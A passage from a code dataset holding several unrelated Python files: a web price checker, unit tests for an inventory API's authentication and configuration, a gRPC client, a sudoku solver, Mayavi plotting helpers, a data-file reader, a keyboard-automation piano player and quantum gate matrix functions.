\"))\n\nheaders = {}\n#headerAux = input(\"Paste de hader: \")\n\nheaders = ({\"User-Agent\": 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'})\n\npagina = requests.get(URL, headers = headers)\nsoup = BeautifulSoup(pagina.content, 'html.parser')\n\ndef getDados():\n\ttitulo = soup.find(id = \"titulo_det\").get_text()\n\n\tfor span in soup.find('div', class_='preco_desconto-cm').findAll('strong'):\n\t\tpreco = span.text\n\n\taux = \"\"\n\ttamanhoPreco = 0\t\n\tfor i in preco:\n\t\tif 
tamanhoPreco > 2:\n\t\t\taux += str(i);\n\t\ttamanhoPreco += 1;\n\n\taux = aux.replace(\".\", \"\")\n\taux = aux.replace(\",\", \".\")\n\n\tpreco = float(aux)\n\n\ttitulo = titulo.strip()\n\n\treturn preco, titulo\n\ndef analisaPreco(preco, precoRequirido):\n\tif preco < precoRequirido:\n\t\treturn True\n\t\n\treturn False\n\npreco, titulo = getDados()\n\nif analisaPreco(preco, precoRequirido):\n\tprint(\"\\nProduto:\", titulo, \"esta disponivel por: R$\", preco)\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"470896996","text":"#!/usr/bin/env python\nfrom base64 import b64encode\nfrom json import dumps\nfrom unittest import main\nfrom unittest import TestCase\nfrom unittest.mock import Mock\nfrom unittest.mock import patch\n\nfrom api import api_operation\nfrom api.host import _order_how\nfrom api.host import _params_to_order_by\nfrom app.auth.identity import from_auth_header\nfrom app.auth.identity import from_bearer_token\nfrom app.auth.identity import Identity\nfrom app.auth.identity import SHARED_SECRET_ENV_VAR\nfrom app.auth.identity import validate\nfrom app.config import Config\nfrom test_utils import set_environment\n\n\nclass ApiOperationTestCase(TestCase):\n \"\"\"\n Test the API operation decorator that increments the request counter with every\n call.\n \"\"\"\n\n @patch(\"api.api_request_count.inc\")\n def test_counter_is_incremented(self, inc):\n @api_operation\n def func():\n pass\n\n func()\n inc.assert_called_once_with()\n\n def test_arguments_are_passed(self):\n old_func = Mock()\n old_func.__name__ = \"old_func\"\n new_func = api_operation(old_func)\n\n args = (Mock(),)\n kwargs = {\"some_arg\": Mock()}\n\n new_func(*args, **kwargs)\n old_func.assert_called_once_with(*args, **kwargs)\n\n def test_return_value_is_passed(self):\n old_func = Mock()\n old_func.__name__ = \"old_func\"\n new_func = 
api_operation(old_func)\n self.assertEqual(old_func.return_value, new_func())\n\n\nclass AuthIdentityConstructorTestCase(TestCase):\n \"\"\"\n Tests the Identity module constructors.\n \"\"\"\n\n @staticmethod\n def _identity():\n return Identity(account_number=\"some number\")\n\n\nclass AuthIdentityFromAuthHeaderTestCase(AuthIdentityConstructorTestCase):\n \"\"\"\n Tests creating an Identity from a Base64 encoded JSON string, which is what is in\n the HTTP header.\n \"\"\"\n\n def test_valid(self):\n \"\"\"\n Initialize the Identity object with an encoded payload – a base64-encoded JSON.\n That would typically be a raw HTTP header content.\n \"\"\"\n expected_identity = self._identity()\n\n identity_data = expected_identity._asdict()\n\n identity_data_dicts = [\n identity_data,\n # Test with extra data in the identity dict\n {**identity_data, **{\"extra_data\": \"value\"}},\n ]\n\n for identity_data in identity_data_dicts:\n with self.subTest(identity_data=identity_data):\n identity = {\"identity\": identity_data}\n json = dumps(identity)\n base64 = b64encode(json.encode())\n\n try:\n actual_identity = from_auth_header(base64)\n self.assertEqual(expected_identity, actual_identity)\n except (TypeError, ValueError):\n self.fail()\n\n self.assertEqual(actual_identity.is_trusted_system, False)\n\n def test_invalid_type(self):\n \"\"\"\n Initializing the Identity object with an invalid type that can’t be a Base64\n encoded payload should raise a TypeError.\n \"\"\"\n with self.assertRaises(TypeError):\n from_auth_header([\"not\", \"a\", \"string\"])\n\n def test_invalid_value(self):\n \"\"\"\n Initializing the Identity object with an invalid Base6č encoded payload should\n raise a ValueError.\n \"\"\"\n with self.assertRaises(ValueError):\n from_auth_header(\"invalid Base64\")\n\n def test_invalid_format(self):\n \"\"\"\n Initializing the Identity object with an valid Base64 encoded payload\n that does not contain the \"identity\" field.\n \"\"\"\n identity = 
self._identity()\n\n dict_ = identity._asdict()\n json = dumps(dict_)\n base64 = b64encode(json.encode())\n\n with self.assertRaises(KeyError):\n from_auth_header(base64)\n\n\nclass AuthIdentityValidateTestCase(TestCase):\n def test_valid(self):\n try:\n identity = Identity(account_number=\"some number\")\n validate(identity)\n self.assertTrue(True)\n except ValueError:\n self.fail()\n\n def test_invalid(self):\n account_numbers = [None, \"\"]\n for account_number in account_numbers:\n with self.subTest(account_number=account_number):\n with self.assertRaises(ValueError):\n Identity(account_number=account_number)\n\n\nclass TrustedIdentityTestCase(TestCase):\n shared_secret = \"ImaSecret\"\n\n def _build_id(self):\n identity = from_bearer_token(self.shared_secret)\n return identity\n\n def test_validation(self):\n identity = self._build_id()\n\n with set_environment({SHARED_SECRET_ENV_VAR: self.shared_secret}):\n validate(identity)\n\n def test_validation_with_invalid_identity(self):\n identity = from_bearer_token(\"InvalidPassword\")\n\n with self.assertRaises(ValueError):\n validate(identity)\n\n def test_validation_env_var_not_set(self):\n identity = self._build_id()\n\n with set_environment({}):\n with self.assertRaises(ValueError):\n validate(identity)\n\n def test_validation_token_is_None(self):\n tokens = [None, \"\"]\n for token in tokens:\n with self.subTest(token_value=token):\n with self.assertRaises(ValueError):\n Identity(token=token)\n\n def test_is_trusted_system(self):\n identity = self._build_id()\n\n self.assertEqual(identity.is_trusted_system, True)\n\n def test_account_number_is_not_set_for_trusted_system(self):\n identity = self._build_id()\n\n self.assertEqual(identity.account_number, None)\n\n\nclass ConfigTestCase(TestCase):\n def test_configuration_with_env_vars(self):\n app_name = \"brontocrane\"\n path_prefix = \"r/slaterock/platform\"\n expected_base_url = f\"/{path_prefix}/{app_name}\"\n expected_api_path = f\"{expected_base_url}/v1\"\n 
expected_mgmt_url_path_prefix = \"/mgmt_testing\"\n\n new_env = {\n \"INVENTORY_DB_USER\": \"fredflintstone\",\n \"INVENTORY_DB_PASS\": \"bedrock1234\",\n \"INVENTORY_DB_HOST\": \"localhost\",\n \"INVENTORY_DB_NAME\": \"SlateRockAndGravel\",\n \"INVENTORY_DB_POOL_TIMEOUT\": \"3\",\n \"INVENTORY_DB_POOL_SIZE\": \"8\",\n \"APP_NAME\": app_name,\n \"PATH_PREFIX\": path_prefix,\n \"INVENTORY_MANAGEMENT_URL_PATH_PREFIX\": expected_mgmt_url_path_prefix,\n }\n\n with set_environment(new_env):\n\n conf = Config()\n\n self.assertEqual(conf.db_uri, \"postgresql://fredflintstone:bedrock1234@localhost/SlateRockAndGravel\")\n self.assertEqual(conf.db_pool_timeout, 3)\n self.assertEqual(conf.db_pool_size, 8)\n self.assertEqual(conf.api_url_path_prefix, expected_api_path)\n self.assertEqual(conf.mgmt_url_path_prefix, expected_mgmt_url_path_prefix)\n\n def test_config_default_settings(self):\n expected_api_path = \"/api/inventory/v1\"\n expected_mgmt_url_path_prefix = \"/\"\n\n # Make sure the environment variables are not set\n with set_environment(None):\n\n conf = Config()\n\n self.assertEqual(conf.db_uri, \"postgresql://insights:insights@localhost/insights\")\n self.assertEqual(conf.api_url_path_prefix, expected_api_path)\n self.assertEqual(conf.mgmt_url_path_prefix, expected_mgmt_url_path_prefix)\n self.assertEqual(conf.db_pool_timeout, 5)\n self.assertEqual(conf.db_pool_size, 5)\n\n def test_config_development_settings(self):\n with set_environment({\"INVENTORY_DB_POOL_TIMEOUT\": \"3\"}):\n\n conf = Config()\n\n self.assertEqual(conf.db_pool_timeout, 3)\n\n\nclass HostOrderHowTestCase(TestCase):\n def test_asc(self):\n column = Mock()\n result = _order_how(column, \"ASC\")\n self.assertEqual(result, column.asc())\n\n def test_desc(self):\n column = Mock()\n result = _order_how(column, \"DESC\")\n self.assertEqual(result, column.desc())\n\n def test_error(self):\n invalid_values = (None, \"asc\", \"desc\", \"BBQ\")\n for invalid_value in invalid_values:\n with 
self.subTest(order_how=invalid_value):\n with self.assertRaises(ValueError):\n _order_how(Mock(), invalid_value)\n\n\n@patch(\"api.host._order_how\")\n@patch(\"api.host.Host.modified_on\")\nclass HostParamsToOrderByTestCase(TestCase):\n def test_default_is_updated_desc(self, modified_on, order_how):\n actual = _params_to_order_by(None, None)\n expected = (modified_on.desc.return_value,)\n self.assertEqual(actual, expected)\n order_how.assert_not_called()\n\n def test_default_for_updated_is_desc(self, modified_on, order_how):\n actual = _params_to_order_by(\"updated\", None)\n expected = (modified_on.desc.return_value,)\n self.assertEqual(actual, expected)\n order_how.assert_not_called()\n\n def test_order_by_updated_asc(self, modified_on, order_how):\n actual = _params_to_order_by(\"updated\", \"ASC\")\n expected = (order_how.return_value,)\n self.assertEqual(actual, expected)\n order_how.assert_called_once_with(modified_on, \"ASC\")\n\n def test_order_by_updated_desc(self, modified_on, order_how):\n actual = _params_to_order_by(\"updated\", \"DESC\")\n expected = (order_how.return_value,)\n self.assertEqual(actual, expected)\n order_how.assert_called_once_with(modified_on, \"DESC\")\n\n @patch(\"api.host.Host.display_name\")\n def test_default_for_display_name_is_asc(self, display_name, modified_on, order_how):\n actual = _params_to_order_by(\"display_name\")\n expected = (display_name.asc.return_value, modified_on.desc.return_value)\n self.assertEqual(actual, expected)\n order_how.assert_not_called()\n\n @patch(\"api.host.Host.display_name\")\n def test_order_by_display_name_asc(self, display_name, modified_on, order_how):\n actual = _params_to_order_by(\"display_name\", \"ASC\")\n expected = (order_how.return_value, modified_on.desc.return_value)\n self.assertEqual(actual, expected)\n order_how.assert_called_once_with(display_name, \"ASC\")\n\n @patch(\"api.host.Host.display_name\")\n def test_order_by_display_name_desc(self, display_name, modified_on, 
order_how):\n actual = _params_to_order_by(\"display_name\", \"DESC\")\n expected = (order_how.return_value, modified_on.desc.return_value)\n self.assertEqual(actual, expected)\n order_how.assert_called_once_with(display_name, \"DESC\")\n\n\nclass HostParamsToOrderByErrorsTestCase(TestCase):\n def test_order_by_bad_field_raises_error(self):\n with self.assertRaises(ValueError):\n _params_to_order_by(Mock(), \"fqdn\")\n\n def test_order_by_only_how_raises_error(self):\n with self.assertRaises(ValueError):\n _params_to_order_by(Mock(), order_how=\"ASC\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":11053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"555349467","text":"import grpc\r\nimport hello_pb2\r\nimport hello_pb2_grpc\r\n\r\ndef run():\r\n with grpc.insecure_channel(\"localhost:50051\") as channel:\r\n stub = hello_pb2_grpc.GreeterStub(channel)\r\n response = stub.SayHello(hello_pb2.HelloRequest(name=\"kapil\"))\r\n print(response.message)\r\n\r\nif __name__ == \"__main__\":\r\n run()","sub_path":"hello_client.py","file_name":"hello_client.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"644033786","text":"from itertools import combinations\n\ndata = input().split()\nword = data[0]\nnum = int(data[1])\n\nfor i in range(1, num + 1):\n for j in combinations(sorted(word), i):\n print(''.join(j))\n\n","sub_path":"hackerrank/python/itertools/itertools_combinations.py","file_name":"itertools_combinations.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"530621108","text":"class Sudoku:\n\n def __init__(self, board):\n self.board = board\n\n def solve_sudoku(self):\n r, c = self.find_next_empty()\n if r is None:\n return 
True\n for guess in range(1, 10):\n if self.is_valid(guess, r, c):\n self.board[r][c] = guess\n if self.solve_sudoku():\n return True\n self.board[r][c] = 0\n return False\n\n def find_next_empty(self):\n # finds the next row, col that's not filled yet which is 0\n # return row, col tuple (or None, None) if there is none\n for r in range(9):\n for c in range(9):\n if self.board[r][c] == 0:\n return r, c\n return None, None\n\n def is_valid(self, guess, r, c):\n r_nums = self.board[r]\n if guess in r_nums:\n return False\n c_nums = []\n for i in range(9):\n c_nums.append(self.board[i][c])\n if guess in c_nums:\n return False\n r_start = (r // 3) * 3\n c_start = (c // 3) * 3\n for r in range(r_start, r_start + 3):\n for c in range(c_start, c_start + 3):\n if self.board[r][c] == guess:\n return False\n return True\n\n def __str__(self):\n board = \"\"\n for i in range(len(self.board)):\n for j in range(len(self.board[0])):\n board += \"|\" + str(self.board[i][j])\n board = board + \"|\\n\"\n return board\n\n def write_to_file(self, filename):\n file = open(filename, \"w\")\n file.write(self.__str__())\n file.close()\n\n\ndef main():\n board_1 = [[5, 3, 0, 0, 7, 0, 0, 0, 0],\n [6, 0, 0, 1, 9, 5, 0, 0, 0],\n [0, 9, 8, 0, 0, 0, 0, 6, 0],\n [8, 0, 0, 0, 6, 0, 0, 0, 3],\n [4, 0, 0, 8, 0, 3, 0, 0, 1],\n [7, 0, 0, 0, 2, 0, 0, 0, 6],\n [0, 6, 0, 0, 0, 0, 2, 8, 0],\n [0, 0, 0, 4, 1, 9, 0, 0, 5],\n [0, 0, 0, 0, 8, 0, 0, 7, 9]]\n\n sudoku = Sudoku(board_1)\n sudoku.solve_sudoku()\n print(sudoku)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"sudoku_solver.py","file_name":"sudoku_solver.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"607319830","text":"import numpy as np\nfrom numpy import pi, cos, sin, abs\nfrom mayavi import mlab\nfrom tvtk.tools import visual\nfrom tvtk.api import tvtk\nfrom tvtk.common import configure_input_data\n\n\nfrom PyMieSim.Tools.utils 
import Sp2Cart\n\nCMAP = 'jet'\nRED = (1,0,0)\nBLUE = (0,0,1)\nYELLOW = (1,1,0)\nWHITE = (1,1,1)\n\ndef ArrowAB(x1, y1, z1, x2, y2, z2, Scale=1):\n\n ar1 = visual.arrow(x = x1,\n y = y1,\n z = z1)\n ar1.length_cone = 0.2*Scale\n arrow_length = np.sqrt((x2-x1)**2+(y2-y1)**2+(z2-z1)**2)\n ar1.actor.scale = [arrow_length*Scale, arrow_length*Scale, arrow_length*Scale]\n ar1.pos = ar1.pos/arrow_length\n ar1.axis = [x2-x1, y2-y1, z2-z1]\n\n\ndef ArrowAVec(Origin,\n Vec,\n Scale = 0.5,\n Color = WHITE,\n ScaleTube = 1.0):\n\n Vec = np.asarray(Vec)\n\n ar1 = visual.arrow(x = Origin[0],\n y = Origin[1],\n z = Origin[2],\n color = Color)\n\n ar1.length_cone = min( 1, 0.35/Scale*ScaleTube )\n\n ar1.actor.scale = np.array([1, 1, 1])*Scale\n\n ar1.radius_shaft = 0.02/Scale*ScaleTube\n\n ar1.radius_cone = 2.5* ar1.radius_shaft\n\n ar1.pos = np.asarray(Origin)/Scale\n\n ar1.axis = Vec\n\n\n\ndef PlotCone(Figure,\n Radius = 1.,\n Origin = (0,0,0),\n Resolution = 10,\n Height = 1.,\n Direction = (0,0,1)):\n\n cone = tvtk.ConeSource(center = Origin,\n radius = Radius,\n resolution = Resolution,\n height = Height,\n direction = Direction)\n\n configure_input_data( tvtk.PolyDataMapper(), cone.output )\n\n cone.update()\n\n p = tvtk.Property(opacity=0.8, color=RED)\n\n actor = tvtk.Actor(mapper=mapper, property=p)\n\n Figure.scene.add_actor(actor)\n\n\ndef ElectricFieldArrow(Figure, Origin, Pol, Scale=0.5):\n Vec = [sin(Pol),cos(Pol),0]\n\n ArrowAVec(Origin = Origin,\n Vec = Vec,\n Scale = Scale,\n Color = RED)\n\n mlab.text3d(x = Vec[0]+Origin[0],\n y = Vec[1]+Origin[1],\n z = Vec[2]+Origin[2],\n text = 'E',\n line_width = 0.1,\n figure = Figure,\n scale = 0.25,\n color = RED)\n\ndef WavenumberArrow(Figure, Origin, Scale=0.5):\n Vec = [0,0,1]\n\n ArrowAVec(Origin = Origin,\n Vec = Vec,\n Scale = Scale,\n Color = YELLOW)\n\n mlab.text3d(x = Vec[0]+Origin[0],\n y = Vec[1]+Origin[1],\n z = Vec[2]+Origin[2],\n text = 'k',\n line_width = 0.1,\n figure = Figure,\n scale = 0.25,\n color = 
YELLOW)\n\n\ndef MagneticFieldArrow(Figure, Origin, Pol, Scale=0.5):\n Vec = [cos(Pol),-sin(Pol),0]\n\n ArrowAVec(Origin = Origin,\n Vec = Vec,\n Scale = Scale,\n Color = BLUE)\n\n mlab.text3d(x = Vec[0]+Origin[0],\n y = Vec[1]+Origin[1],\n z = Vec[2]+Origin[2],\n text = 'B',\n line_width = 0.1,\n figure = Figure,\n scale = 0.25,\n color = BLUE)\n\n\ndef AddSource(Figure, Origin, Polarization, Scale=0.5):\n ElectricFieldArrow(Figure, Origin, Polarization, Scale=Scale)\n MagneticFieldArrow(Figure, Origin, Polarization, Scale=Scale)\n WavenumberArrow(Figure, Origin, Scale=Scale)\n\n\ndef AddUnitSphere(Num, Radius, Origin, Figure):\n\n Coord = list( UnitSphere(Num=50, Radius=Radius) )\n\n Coord[0] += Origin[0]\n Coord[1] += Origin[1]\n Coord[2] += Origin[2]\n\n mlab.mesh(*Coord, colormap='gray', opacity=0.5, figure=Figure)\n\n\ndef AddUnitAxes(Figure,\n Scale = 1.,\n Origin = (0,0,0),\n Label = True,\n ScaleTube = 1.0):\n\n mlab.points3d(0, 0, 0, opacity=0.01, scale_factor=0.01, figure=Figure)\n\n ArrowAVec(Origin, (0, 0, 1), Scale=Scale, ScaleTube=ScaleTube)\n if Label: mlab.text3d(x = Origin[0],\n y = Origin[1],\n z = Origin[2]+Scale,\n text = 'Z',\n line_width = 0.1,\n figure = Figure,\n scale = 0.25)\n\n ArrowAVec(Origin, (0, 1, 0), Scale=Scale, ScaleTube=ScaleTube)\n if Label: mlab.text3d(x = Origin[0],\n y = Origin[1]+Scale,\n z = Origin[2],\n text = 'Y',\n line_width = 0.1,\n figure = Figure,\n scale = 0.25)\n\n ArrowAVec(Origin, (1, 0, 0), Scale=Scale, ScaleTube=ScaleTube)\n if Label: mlab.text3d(x = Origin[0]+Scale,\n y = Origin[1],\n z = Origin[2],\n text = 'X',\n line_width = 0.01,\n figure = Figure,\n scale = 0.25)\n\n\ndef UnitSphere(Num, Radius=1.):\n phi, theta = np.mgrid[-pi/2:pi/2:complex(Num), -pi:pi:complex(Num)]\n\n return Sp2Cart(phi*0+Radius, phi, theta)\n\n\ndef implicit_plot(expr,\n ext_grid,\n fig_handle = None,\n Nx = 101,\n Ny = 101,\n Nz = 101,\n col_isurf = (50/255, 199/255, 152/255),\n col_osurf = (240/255, 36/255, 87/255),\n opa_val = 
0.8,\n opaque = True,\n ori_axis = True,\n **kwargs):\n \"\"\"Function to plot algebraic surfaces described by implicit equations in Mayavi\n\n Implicit functions are functions of the form\n\n `F(x,y,z) = c`\n\n where `c` is an arbitrary constant.\n\n Parameters\n ----------\n expr : string\n The expression `F(x,y,z) - c`; e.g. to plot a unit sphere, the `expr` will be `x**2 + y**2 + z**2 - 1`\n ext_grid : 6-tuple\n Tuple denoting the range of `x`, `y` and `z` for grid; it has the form - (xmin, xmax, ymin, ymax, zmin, zmax)\n fig_handle : figure handle (optional)\n If a mayavi figure object is passed, then the surface shall be added to the scene in the given figure. Then, it is the responsibility of the calling function to call mlab.show().\n Nx, Ny, Nz : Integers (optional, preferably odd integers)\n Number of points along each axis. It is recommended to use odd numbers to ensure the calculation of the function at the origin.\n col_isurf : 3-tuple (optional)\n color of inner surface, when double-layered surface is used. 
This is also the specified color for single-layered surface.\n col_osurf : 3-tuple (optional)\n color of outer surface\n opa_val : float (optional)\n Opacity value (alpha) to use for surface\n opaque : boolean (optional)\n Flag to specify whether the surface should be opaque or not\n ori_axis : boolean\n Flag to specify whether a central axis to draw or not\n\n \"\"\"\n if fig_handle==None: # create a new figure\n fig = mlab.figure(1,bgcolor=(0.97, 0.97, 0.97), fgcolor=(0, 0, 0), size=(800, 800))\n else:\n fig = fig_handle\n xl, xr, yl, yr, zl, zr = ext_grid\n x, y, z = np.mgrid[xl:xr:eval('{}j'.format(Nx)),\n yl:yr:eval('{}j'.format(Ny)),\n zl:zr:eval('{}j'.format(Nz))]\n scalars = eval(expr)\n src = mlab.pipeline.scalar_field(x, y, z, scalars)\n if opaque:\n delta = 1.e-5\n opa_val=1.0\n else:\n delta = 0.0\n #col_isurf = col_osurf\n # In order to render different colors to the two sides of the algebraic surface,\n # the function plots two contour3d surfaces at a "distance" of delta from the value\n # of the solution.\n # the second surface (contour3d) is only drawn if the algebraic surface is specified\n # to be opaque.\n cont1 = mlab.pipeline.iso_surface(src, color=col_isurf, contours=[0-delta],\n transparent=False, opacity=opa_val)\n cont1.compute_normals = False # for some reasons, setting this to true actually cause\n # more unevenness on the surface, instead of more smooth\n if opaque: # the outer surface is specular, the inner surface is not\n cont2 = mlab.pipeline.iso_surface(src, color=col_osurf, contours=[0+delta],\n transparent=False, opacity=opa_val)\n cont2.compute_normals = False\n cont1.actor.property.backface_culling = True\n cont2.actor.property.frontface_culling = True\n cont2.actor.property.specular = 0.2 #0.4 #0.8\n cont2.actor.property.specular_power = 55.0 #15.0\n else: # make the surface (the only surface) specular\n cont1.actor.property.specular = 0.2 #0.4 #0.8\n cont1.actor.property.specular_power = 55.0 #15.0\n\n # Scene lights (4 lights 
are used)\n engine = mlab.get_engine()\n scene = engine.current_scene\n cam_light_azimuth = [78, -57, 0, 0]\n cam_light_elevation = [8, 8, 40, -60]\n cam_light_intensity = [0.72, 0.48, 0.60, 0.20]\n \"\"\"\n for i in range(4):\n camlight = scene.scene.light_manager.lights[i]\n camlight.activate = True\n camlight.azimuth = cam_light_azimuth[i]\n camlight.elevation = cam_light_elevation[i]\n camlight.intensity = cam_light_intensity[i].\n \"\"\"\n # axis through the origin\n if ori_axis:\n len_caxis = int(1.05*np.max(np.abs(np.array(ext_grid))))\n caxis = mlab.points3d(0.0, 0.0, 0.0, len_caxis, mode='axes',color=(0.15,0.15,0.15),\n line_width=1.0, scale_factor=1.,opacity=1.0)\n caxis.actor.property.lighting = False\n # if no figure is passed, the function will create a figure.\n if fig_handle==None:\n # Setting camera\n cam = fig.scene.camera\n cam.elevation(-20)\n cam.zoom(1.0) # zoom should always be in the end.\n mlab.show()\n\n\n# -\n","sub_path":"PyMieSim/Tools/PlotsUtils.py","file_name":"PlotsUtils.py","file_ext":"py","file_size_in_byte":10557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"323968784","text":"# nombre / anomalo/ ini / fin\n\n\n\n\n\nclass normal():\n def __init__(self, nombre, tipo):\n self.name = nombre\n self.type = tipo\n\n\nclass section():\n def __init__(self, inicio, duracion):\n self.inicio = inicio\n self.duracion = duracion\n\n\nclass anomalous(normal):\n def __init__(self, nombre, tipo, listaTramosAnomalos=[], listaTramosNoUtiles=[]):\n normal.__init__(self, nombre, tipo)\n self.tramosAnomalos = listaTramosAnomalos\n self.tramos_no_usar = listaTramosNoUtiles\n\n\ndef leer(src_normal, src_anomalous):\n lista1, lista2 = [], []\n arch1 = open(src_normal, 'r')\n for line in arch1:\n line = line[:-1]\n v_n = normal(line, 0)\n lista1.append(v_n)\n arch1.close()\n arch2 = open(src_anomalous, 'r')\n for line in arch2:\n linea = line.split('/')\n #print(linea)\n v_n = anomalous(linea[0], 
1)\n\n linea_no_usar = linea[1].split(\" \")\n tramosNoUsar = []\n #print(linea_no_usar)\n i = 0\n while i < len(linea_no_usar)-1:\n tramosNoUsar.append(\n section(linea_no_usar[i], linea_no_usar[i+1]))\n i += 2\n v_n.tramos_no_usar = tramosNoUsar\n\n linea_anomalos = linea[2].split(\" \")\n #print(linea_anomalos)\n tramosAnomalos = []\n i = 0\n while i < len(linea_anomalos)-1:\n tramosAnomalos.append(\n section(linea_anomalos[i], linea_anomalos[i+1]))\n i += 2\n v_n.tramosAnomalos = tramosAnomalos\n lista2.append(v_n)\n arch1.close()\n return lista1, lista2\n\n\n#l1, l2 = leer(rt.n_tr_data_txt, rt.a_tr_data_txt)\n\n\"\"\" for i in l2:\n print(i.name, i.type, end=\" \")\n print(\"-\", end=\"\")\n for t in i.tramos_no_usar:\n print(t.inicio, t.duracion, end=\" \")\n print(\"-\", end=\"\")\n for t in i.tramosAnomalos:\n print(t.inicio, t.duracion, end=\" \")\n print(\"\")\nprint(rt.a_tr_data_txt) \"\"\"\n","sub_path":"Python Files/Crime Detection/resnet/leertxt.py","file_name":"leertxt.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"357437589","text":"# -*- coding: utf-8 -*-\n\nfrom pyautogui import * # Use to interact with I/O keyboard \nimport webbrowser # Use to lauchn VirtualPiano on a web browser\nimport json # Use to interact with a song.json\n\n# [NEED TO FIX SOMETHING HERE] --> Need to ask at user what song need to be play\nfor songs in json.load(open(\"./songs.json\")):\n song = songs.pop('Curb_Your_Enthusiasm')\n\n # [NEED TO FIX SOMETHING HERE] --> Need to recover the good delay in depend of variable song'\n delay = ...\n\n# This dictionary convert keymusic in keyboard using by Virtual Piano\nkeys = {'c1': '1', 'C1': '!', 'd1': '2', 'D1': '@', 'e1': '3', 'f1': '4', 'F1': '$', 'g1': '5', 'G1': '%', 'a1': '6', 'A1': '^', 'b1': '7', # First Octave \n 'c2': '8', 'C2': '*', 'd2': '9', 'D2': '(', 'e2': '0', 'f2': 'q', 'F2': 'Q', 'g2': 'w', 'G2': 'W', 'a2': 'e', 
'A2': 'E', 'b2': 'r', # Second Octave\n 'c3': 't', 'C3': 'T', 'd3': 'y', 'D3': 'Y', 'e3': 'u', 'f3': 'i', 'F3': 'I', 'g3': 'o', 'G3': 'O', 'a3': 'p', 'A3': 'P', 'b3': 'a', # Third Octave\n 'c4': 's', 'C4': 'S', 'd4': 'd', 'D4': 'D', 'e4': 'f', 'f4': 'g', 'F4': 'G', 'g4': 'h', 'G4': 'H', 'a4': 'j', 'A4': 'J', 'b4': 'k', # Fourth Octave\n 'c5': 'l', 'C5': 'L', 'd5': 'z', 'D5': 'W', 'e5': 'x', 'f5': 'c', 'F5': 'C', 'g5': 'v', 'G5': 'V', 'a5': 'b', 'A5': 'B', 'b5': 'n', # Fifth Octave\n 'c6': 'm', '-': '-'} # Sixth Octave + '-' term use to the time.sleep\n\n# The specific website use to play piano with keyboard --> Make sure tto switch your keyboard in ENG format\npiano_url = 'https://virtualpiano.net'\n\n\ndef play_song():\n \"\"\" This function is use to press key on the website and play the song with each note in song\n\n Parameters\n ----------\n ??? maybe use song later to play song ask by user with function input ???\n\n Version\n -------\n Specification : Lionel Loncin (v.1 06/18/2019)\n Implementation : Lionel Loncin (v.1 06/17/2019)\n Lucas Maes (v.1.1 06/17/2019)\"\"\"\n\n for letter in song_converter(song):\n\n if letter == '-':\n time.sleep(0.02)\n press(letter)\n\n\ndef song_converter(song):\n \"\"\" This function return a new string which separate each note and time.sleep\n\n Parameter\n -----------\n song : string of all notes in a song (str)\n\n Version\n -------\n Specification : Lionel Loncin (v.1 06/18/2019)\n Implementation : Lucas Maes (v.1 06/17/2019) \"\"\"\n\n pattern = ''\n new_song = ''\n for letters in song:\n if letters == '-':\n print(pattern)\n if pattern != '':\n new_song += keys[pattern]\n pattern = ''\n new_song += '-'\n else:\n if len(pattern) > 0 and pattern[-1] in '0123456789':\n new_song += keys[pattern]\n pattern = ''\n pattern += letters\n\n return new_song\n\n\ndef main():\n webbrowser.open_new(piano_url)\n time.sleep(7)\n play_song()\n\n\nif __name__ == \"__main__\":\n 
main()\n\n\n\n\n\n\n","sub_path":"python_piano.py","file_name":"python_piano.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"101004219","text":"import numpy as np\r\nimport math\r\nfrom math import e\r\n\r\ndef rx(theta, qubit, total):\r\n rx=np.array([[math.cos(theta/2), -1J*math.sin(theta/2)],\r\n [1J*math.sin(theta/2),math.cos(theta/2)]])\r\n rx=np.kron(np.identity(2**qubit),rx)\r\n rx=np.kron(rx,np.identity(2**(total-qubit-1)))\r\n return rx\r\n\r\n\r\ndef ry(theta, qubit, total):\r\n ry=np.array([[math.cos(theta/2), -1*math.sin(theta/2)],\r\n [math.sin(theta/2),math.cos(theta/2)]])\r\n ry=np.kron(np.identity(2**qubit),ry)\r\n ry=np.kron(ry,np.identity(2**(total-qubit-1)))\r\n return ry \r\n\r\ndef cnot(ctrl, target, total):\r\n if ctrl < target:\r\n cnot = np.array([[1,0,0,0],[0,1,0,0],[0,0,0,1],[0,0,1,0]])\r\n \r\n if target < ctrl:\r\n cnot = np.array([[0,1,0,0],[1,0,0,0],[0,0,1,0],[0,0,0,1]])\r\n for k in range(min(ctrl,target)):\r\n cnot=np.kron(np.identity(2),cnot)\r\n for k in range(total-max(ctrl,target)-1):\r\n cnot=np.kron(cnot,np.identity(2))\r\n return cnot\r\n\r\ndef swap(q1, q2, total):\r\n swap= np.array([[1,0,0,0],[0,0,1,0],[0,1,0,0],[0,0,0,1]])\r\n\r\n for k in range(min(q1,q2)):\r\n swap=np.kron(np.identity(2),swap)\r\n for k in range(total-max(q1,q2)-1):\r\n swap=np.kron(swap,np.identity(2))\r\n return swap\r\n\r\ndef two_Q(theta1, theta2, q1, direction, total):\r\n \"\"\"Theta1 is on the higher one\"\"\"\r\n \"\"\"Q1 is the higher one\"\"\"\r\n \"\"\" higher one literally means above in circuit diagram\"\"\"\r\n \r\n r1 = ry(theta1,q1,total)\r\n r2 = ry(theta2,q1+1,total)\r\n two_Q = 